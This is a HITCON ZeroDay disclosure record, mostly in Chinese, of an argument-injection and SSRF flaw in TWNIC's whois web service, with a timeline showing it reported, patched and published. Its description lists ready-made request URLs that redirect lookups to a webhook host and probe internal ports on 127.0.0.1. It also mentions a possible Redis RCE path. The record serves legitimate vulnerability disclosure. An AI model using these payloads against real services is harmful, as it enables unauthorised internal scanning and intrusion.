Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2025-00354
- 發信 Vendor: 財團法人台灣網路資訊中心
- Title: TWNIC Whois服務 參數注入、SSRF、有RCE風險
- Introduction: 參數注入、SSRF、有RCE風險
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2025/05/02 10:50:40 : 新提交 (由 {{萌新}} 更新此狀態)
- 2025/05/02 18:32:26 : 新提交 (由 {{萌新}} 更新此狀態)
- 2025/05/03 17:59:30 : 新提交 (由 {{萌新}} 更新此狀態)
- 2025/05/05 11:26:43 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/05/21 12:16:21 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/05/21 12:16:21 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/05/21 12:16:21 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/05/21 12:36:50 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/05/21 12:36:50 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/05/21 12:36:50 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/05/27 16:17:25 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/05/27 17:06:59 : 確認已修補 (由 {{萌新}} 更新此狀態)
- 2025/05/31 03:00:09 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2025-00354
- 通報者:nhd1261 ({{萌新}})
- 風險:高
- 類型:Server-Side Request Forgery (SSRF)
參考資料
相關網址
敘述
whois 服務直接調用jwhois工具,導致參數注入,例如輸入 -- 會跳出jwhois的help訊息:
https://www.twnic.tw/whois_n.cgi?&query=--
可以使用-h和-p指定查詢的Whois伺服器,嘗試-h 指定webhook,發現有DNS查詢請求傳出:
https://www.twnic.tw/whois_n.cgi?&query=1.1.1.1 -h dns.webhook
因Whois協議的結構很鬆散,請求僅輸入的域名或IP,沒有任何標頭,同時whois工具又不會檢查使用者輸入,所以可以透過輸入任意域名去偽造其他純文本協議探測內網,簡單的試了一下一些常用port,可以發現SSH、SMTP、http、https、MySQL有回應。另外,因whois協議可以偽造成dict協議,如果內網中存在redis會有RCE風險,應盡速修復。
https://www.twnic.tw/whois_n.cgi?&query=SHOW%20DB%20-h%20127.0.0.1%20-p%2022
https://www.twnic.tw/whois_n.cgi?&query=QUIT%20DB%20-h%20127.0.0.1%20-p%2025
https://www.twnic.tw/whois_n.cgi?&query=SHOW%20DB%20-h%20127.0.0.1%20-p%2080
https://www.twnic.tw/whois_n.cgi?&query=SHOW%20DB%20-h%20127.0.0.1%20-p%203306
https://www.twnic.tw/whois_n.cgi?&query=GET%20.%20HTTP:1.0%20-h%20127.0.0.1%20-p%20443